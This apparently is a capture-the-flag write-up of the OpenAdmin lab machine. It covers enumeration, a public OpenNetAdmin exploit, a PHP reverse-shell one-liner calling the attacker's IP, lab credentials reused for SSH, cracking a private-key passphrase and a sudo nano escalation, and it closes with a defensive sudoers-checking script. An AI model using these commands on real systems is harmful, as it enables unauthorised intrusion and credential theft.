Today, we’re going to solve another CTF machine, OpenAdmin. It is now a retired box and is accessible to VIP members.
Specifications
- Target OS : Linux
- Services : SSH, HTTP
- IP Address : 10.10.10.171
- Difficulty : Easy
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step is the reconnaissance phase, starting with port scanning.
Ports Scanning
During this step, we’re gonna fingerprint the target to see what’s running behind the IP address. Note that -oA takes an output basename before the target, so the scan command needs the address twice:
nmap -sC -sV -oA 10.10.10.171 10.10.10.171
Enumerating Port 80
By running gobuster we found the /music and /artwork directories, both returning a 301 status code.
gobuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.10.171/ -s '200,204,301,302,307,403,500' -e | tee '/root/htb/10.10.10.171/scans/10.10.10.171_80_gobuster_common.txt'
Enumerating Music Directory
If we browse to http://10.10.10.171/music and click on Login, we find OpenNetAdmin installed.
Let’s enumerate OpenNetAdmin and Google what it really is.
Searchsploit
Searchsploit confirms there are exploits for OpenNetAdmin. Since our target version is 18.1.1, we get two exploits for it.
Let’s mirror it with searchsploit -m exploits/php/webapps/47691.sh.
I tried to run the exploit, but it didn’t work for some reason.
I had to run dos2unix on 47691.sh.
And we got a low-privilege shell.
By going through the ona config file we found database creds.
Database
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
Foothold
Let’s try getting a proper shell first.
I tried every reverse shell, such as Perl, Python, and bash; none of them worked for me.
I used wget to fetch p0wny-shell, uploaded it, and got a reverse shell that way.
php -r '$sock=fsockopen("10.10.14.242",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
And we got a reverse shell instantly.
It seems we don’t have permission to read either of the directories.
If you remember, we have SQL database creds; let’s dump the database.
We don’t have access to SQL, and SQLDump isn’t installed either.
The database password is reused for jimmy.
Let’s SSH in as jimmy with the SQL creds we found.
ssh jimmy@10.10.10.171
n1nj4W4rri0R!
After doing some enumeration and looking for something interesting, we got it!
If you take a look at main.php, you’ll see it’s our way to get joanna’s SSH private key. But we don’t know where it’s hosted, so let’s take a look at the Apache config.
If you take a look at internal.conf, you’ll see it’s running on port 52846. Let’s make sure that port is open to us.
It seems it’s only open to the local network, but luckily we’re already on it.
curl localhost:52846/main.php
And we got joanna’s private SSH key.
Let’s crack its passphrase using rsakey-cracker (GitHub - quarantin/rsakey-cracker: Tool to brute-force the passphrase of an RSA private key in PEM format).
And we got the passphrase!
bloodninjas
Let’s SSH in as joanna, entering the passphrase when prompted.
ssh -i key joanna@10.10.10.171
bloodninjas
Now that we’re logged in as joanna, let’s do some enumeration.
Privilege Escalation
If we run sudo -l, we see that joanna can run nano on /opt/priv via sudo without a password.
Running sudo /bin/nano /opt/priv drops us into the nano editor.
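The sudo rule above is the classic editor-granted-as-root misconfiguration. As an added example, not part of the original writeup, the following Python script parses sudoers-style user specifications from a constructed sample (SAMPLE_SUDOERS is not the target’s real /etc/sudoers; only the joanna line mirrors what sudo -l showed) and flags any rule that hands a user an interactive editor as another user, suggesting the sudoedit form that sudo provides for exactly this case. EDITOR_BINARIES, parse_rules and risky_editor_rules are assumed names.

```python
import re
from pathlib import Path
from typing import Dict, List

# Constructed sample (not the target's real /etc/sudoers). The joanna line mirrors
# the rule shown by sudo -l above; the other lines are assumptions for contrast.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
jimmy   ALL=(ALL) /usr/bin/systemctl restart apache2
deploy  ALL=(root) NOPASSWD: sudoedit /etc/motd
"""

# Interactive editors and pagers: a sudo grant on one of these is not a read-only
# grant, however narrow the file argument looks. sudoedit is the supported form.
EDITOR_BINARIES = {"nano", "vi", "vim", "vim.basic", "vim.tiny", "emacs", "less", "more"}

# user  host=(runas) [TAG: ...] command[, command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def parse_rules(text: str) -> List[Dict[str, str]]:
    """Parse user-specification lines; blanks, comments and Defaults are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({k: (v or "").strip() for k, v in m.groupdict().items()})
    return rules

def risky_editor_rules(rules: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per command that grants an editor from EDITOR_BINARIES."""
    findings = []
    for rule in rules:
        for cmd in rule["cmds"].split(","):
            argv = cmd.split()
            if argv and Path(argv[0]).name in EDITOR_BINARIES:
                runas = rule["runas"] or "root"
                target = argv[1] if len(argv) > 1 else "<file>"
                findings.append({
                    "user": rule["user"],
                    "runas": runas,
                    "nopasswd": "NOPASSWD" in rule["tags"],
                    "command": cmd.strip(),
                    "fix": f"replace with: {rule['user']} ALL=({runas}) sudoedit {target}",
                })
    return findings

if __name__ == "__main__":
    for finding in risky_editor_rules(parse_rules(SAMPLE_SUDOERS)):
        print(finding)
```

Run against a real sudoers file by feeding its text to parse_rules; the joanna rule is the only one in the sample that is flagged.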